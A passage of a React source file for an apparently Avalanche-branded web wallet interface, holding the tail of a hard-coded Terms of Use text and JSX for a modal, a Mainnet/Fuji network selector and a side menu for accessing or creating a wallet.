PARTY PROVIDERS OF PRODUCTS OR SERVICES. NO REPRESENTATION OR OTHER AFFIRMATION OF FACT, INCLUDING STATEMENTS REGARDING CAPACITY, SUITABILITY FOR USE OR PERFORMANCE OF THE SITE, OR ITS CONTENTS, WHETHER OR NOT MADE BY ANY US, WHICH IS NOT EXPRESSLY CONTAINED IN THESE TERMS, SHALL BE DEEMED TO BE A WARRANTY BY THE INVOLVED PERSONS FOR ANY PURPOSE, OR GIVE RISE TO ANY LIABILITY. AS WITH THE PURCHASE OF A PRODUCT OR SERVICE THROUGH ANY MEDIUM OR IN ANY ENVIRONMENT, YOU SHOULD USE YOUR BEST JUDGMENT AND EXERCISE CAUTION WHERE APPROPRIATE.<br/><br/>



LIMITATIONS OF LIABILITY<br/><br/>
IN NO EVENT WILL WE OR OUR OFFICERS, DIRECTORS, SHAREHOLDERS, EMPLOYEES, SUB-CONTRACTORS, AFFILIATES OR AGENTS BE LIABLE TO YOU OR ANY THIRD PARTY FOR ANY DIRECT, INDIRECT, CONSEQUENTIAL, EXEMPLARY, STATUTORY, INCIDENTAL, SPECIAL, OR PUNITIVE DAMAGES, INCLUDING LOST PROFIT, LOST REVENUE, LOSS OF DATA, COSTS, EXPENSES AND PAYMENTS, EITHER IN TORT (INCLUDING NEGLIGENCE), CONTRACT, OR OTHER DAMAGES, IN ANY OTHER FORM, ARISING FROM, OR IN CONNECTION WITH, YOUR USE OF THE SITE, THE INABILITY TO USE THE SITE, THE SITE FEATURES, MARKETING OF THE SITE OR SITE FEATURES, OR ANY FORM OF FAILURE, ERROR, OR BREAKDOWN IN USE OF THE SITE , FROM ANY FAULT, OR ERROR MADE BY US, OR FROM YOUR RELIANCE ON CONTENT AVAILABLE ON THE SITE, OR FROM ANY COMMUNICATION THROUGH THE SITE, OR WITH OTHER USERS ON THE SITE, OR FROM ANY DENIAL OR CANCELATION OF YOUR USER ACCOUNT, OR FROM RETENTION, DELETION, DISCLOSURE AND ANY OTHER USE OR LOSS OF YOUR CONTENT ON THE SITE. EVEN IF WE HAVE BEEN ADVISED OF THE POSSIBILITY OF SUCH DAMAGES. NOTWITHSTANDING ANYTHING TO THE CONTRARY CONTAINED HEREIN, OUR LIABILITY TO YOU FOR ANY CAUSE WHATSOEVER AND REGARDLESS OF THE FORM OF THE ACTION, WILL AT ALL TIMES BE LIMITED TO $500.00 USD. CERTAIN US STATE LAWS AND INTERNATIONAL LAWS DO NOT ALLOW LIMITATIONS ON IMPLIED WARRANTIES OR THE EXCLUSION OR LIMITATION OF CERTAIN DAMAGES. IF THESE LAWS APPLY TO YOU, SOME OR ALL OF THE ABOVE DISCLAIMERS OR LIMITATIONS MAY NOT APPLY TO YOU, AND YOU MAY HAVE ADDITIONAL RIGHTS.



INDEMNIFICATION
You agree to defend, indemnify, and hold us harmless, including our subsidiaries, affiliates, and all of our respective officers, agents, partners, and employees, from and against any loss, damage, liability, claim, or demand, including reasonable attorneys’ fees and expenses, made by any third party due to or arising out of: (1) your access to or use of the Site; (2) your breach of these Terms of Use; (3) any breach of your representations and warranties set forth in these Terms of Use; (4) your violation of the rights of a third party, including but not limited to intellectual property rights; or (5) any overt harmful act toward any other user of the Site with whom you connected via the Site. Notwithstanding the foregoing, we reserve the right, at your expense, to assume the exclusive defense and control of any matter for which you are required to indemnify us, and you agree to cooperate, at your expense, with our defense of such claims. We will use reasonable efforts to notify you of any such claim, action, or proceeding which is subject to this indemnification upon becoming aware of it.<br/><br/>


<br/><br/>
USER DATA
We will maintain certain data that you transmit to the Site for the purpose of managing the performance of the Site, as well as data relating to your use of the Site. Although we perform regular routine backups of data, you are solely responsible for all data that you transmit or that relates to any activity you have undertaken using the Site. You agree that we shall have no liability to you for any loss or corruption of any such data, and you hereby waive any right of action against us arising from any such loss or corruption of such data.



ELECTRONIC COMMUNICATIONS, TRANSACTIONS, AND SIGNATURES
Visiting the Site, sending us emails, and completing online forms constitute electronic communications. You consent to receive electronic communications, and you agree that all agreements, notices, disclosures, and other communications we provide to you electronically, via email and on the Site, satisfy any legal requirement that such communication be in writing. YOU HEREBY AGREE TO THE USE OF ELECTRONIC SIGNATURES, CONTRACTS, ORDERS, AND OTHER RECORDS, AND TO ELECTRONIC DELIVERY OF NOTICES, POLICIES, AND RECORDS OF TRANSACTIONS INITIATED OR COMPLETED BY US OR VIA THE SITE. You<br/><br/>

hereby waive any rights or requirements under any statutes, regulations, rules, ordinances, or other laws in any jurisdiction which require an original signature or delivery or retention of non- electronic records, or to payments or the granting of credits by any means other than electronic means.<br/><br/>



CALIFORNIA USERS AND RESIDENTS<br/><br/>
If any complaint with us is not satisfactorily resolved, you can contact the Complaint Assistance Unit of the Division of Consumer Services of the California Department of Consumer Affairs in writing at 1625 North Market Blvd., Suite N 112, Sacramento, California 95834 or by telephone at (800) 952-5210 or (916) 445-1254.<br/><br/>



MISCELLANEOUS<br/><br/>
These Terms of Use and any policies or operating rules posted by us on the Site or in respect to the Site constitute the entire agreement and understanding between you and us. Our failure to exercise or enforce any right or provision of these Terms of Use shall not operate as a waiver of such right or provision. These Terms of Use operate to the fullest extent permissible by law. We may assign any or all of our rights and obligations to others at any time. We shall not be responsible or liable for any loss, damage, delay, or failure to act caused by any cause beyond our reasonable control. If any provision or part of a provision of these Terms of Use is determined to be unlawful, void, or unenforceable, that provision or part of the provision is deemed severable from these Terms of Use and does not affect the validity and enforceability of any remaining provisions. There is no joint venture, partnership, employment or agency relationship created<br/><br/>

between you and us as a result of these Terms of Use or use of the Site. You agree that these Terms of Use will not be construed against us by virtue of having drafted them. You hereby waive any and all defenses you may have based on the electronic form of these Terms of Use and the lack of signing by the parties hereto to execute these Terms of Use.<br/><br/>



CONTACT US<br/><br/>
In order to resolve a complaint regarding the Site or to receive further information regarding use of the Site, please contact us at:<br/><br/>



Avalanche (BVI) Inc.<br/><br/>

Floor 4, Banco Popular Building<br/><br/>
Road Town, Tortola VG1110<br/><br/>
British Virgin Islands<br/><br/>
<Text color="green" textDecoration="underline">support@avax.network</Text>

						</Flex>
					</Flex>
				}
				</Flex>




				{/****************** MODAL ********************/}
				{
					modal &&
					<Flex position="fixed" w="100%" height="100%" zIndex="1000" align="center" bg="rgba(0,0,0,0.5)">
						<Flex bg={!dark ? "#fff" : "#2e3234"} maxHeight="50vh" padding={["10% 5%", "5%"]} justify="center" w={["90%", "40%"]} ml={["5%", "30%"]} direction="column" align="center">
							{modalMsg}
							<Text as="span" textDecoration="underline" color="#867e89" mt="5%" cursor="pointer" onClick={() => setModal(false)}>Cancel</Text>
						</Flex>
					</Flex>
				}



				{
					side &&
					<Flex position="fixed" w="100%" height="100%" zIndex="1000" align="center" bg="rgba(0,0,0,0.5)" justify="flex-end">
						<Flex bg={!dark ? "#fff" : "#2e3234"} h="100vh" padding="2%" w="30%" direction="column" align="flex-start" borderTopLeftRadius="6px" borderBottomLeftRadius="6px" direction="column">
							<Flex justify="space-between" align="center" w="100%" borderBottom="1px solid #f5f6fa" pb="1">
								<Text fontWeight="bold">Networks</Text>
								<Button bg="#e84970" padding="10px 24px" color="#fff" mb="25px" fontSize="14px" onClick={() => setSide(false)}>Cancel</Button>
							</Flex>

							<Flex w="100%" borderBottom="1px solid #f5f6fa" py="2">
								<Text w="100%">
									Mainnet
									<Flex justify="space-between" w="100%">
										<Text color="#867e89" fontSize="12px">https://api.avax.network:443</Text>
										<Text color={walletType === "Mainnet" ? "#e84970" : "#4c2e56"} onClick={() => setWalletType("Mainnet")} cursor="pointer">{ walletType === "Mainnet" ? "Connected" : "Select" }</Text>
									</Flex>
								</Text>
							</Flex>

							<Flex w="100%" borderBottom="1px solid #f5f6fa" py="2">
								<Text w="100%">
									Fuji
									<Flex justify="space-between" w="100%">
										<Text color="#867e89" fontSize="12px">https://api.avax-test.network:443</Text>
										<Text color={walletType === "Fuji" ? "#e84970" : "#4c2e56"} onClick={() => setWalletType("Fuji")} cursor="pointer">{ walletType === "Fuji" ? "Connected" : "Select" }</Text>
									</Flex>
								</Text>
							</Flex>
							
						</Flex>
					</Flex>
				}



				{
					menuBar && 
					<Flex position="fixed" w="100%" height="100%" zIndex="1000" bg="rgba(0,0,0,0.1)" onClick={() => {
						setMenuBar(false)
						setBarWidth("30%")
					}}>
						<Flex bg={!dark ? "#f5f6fa" : "#2e3234"} h="100vh" padding={["5% 3%", "5%"]} justify="flex-start" w={barWidth} direction="column" boxShadow="6px 6px 6px 6px rgba(0,0,0,0.1)" transition="width .2s ease-out">
							<Flex mb="3" w="100%" justify="space-between" align="center">
								<Image src={wallet2} h="30px" w="auto" onClick={() => setScreen(0)}/>
								<Image src={day} h="18px" w="auto" onClick={() => dark ? setDark(false) : setDark(true)}/>
							</Flex>
							<Flex cursor="pointer" bg={iniMenu === "access" ? "#fff" : "transparent"} py="3" px="2" color={iniMenu === "access" ? "#4c2e56" : "#867e89"} onClick={() => {
								setScreen(1)
								setIniMenu("access")
							}}>Access Wallet</Flex>
							<Flex cursor="pointer" bg={iniMenu === "create" ? "#fff" : "transparent"} py="3" px="2" color={iniMenu === "create" ? "#4c2e56" : "#867e89"} onClick={() => {
								setScreen(5)
								setIniMenu("create")
							}}>Create New Wallet</Flex>

							<Flex cursor="pointer" align="center" mt="auto" onClick={() => {
								setModalMsg("Language Default set to: English")
								setModal(true)
							}}><Image src={usa} w="18px" h="14px" mr="2" />English</Flex>
						</Flex>
					</Flex>
				}
			</Flex>
		</ChakraProvider>
	)
}

export default App;
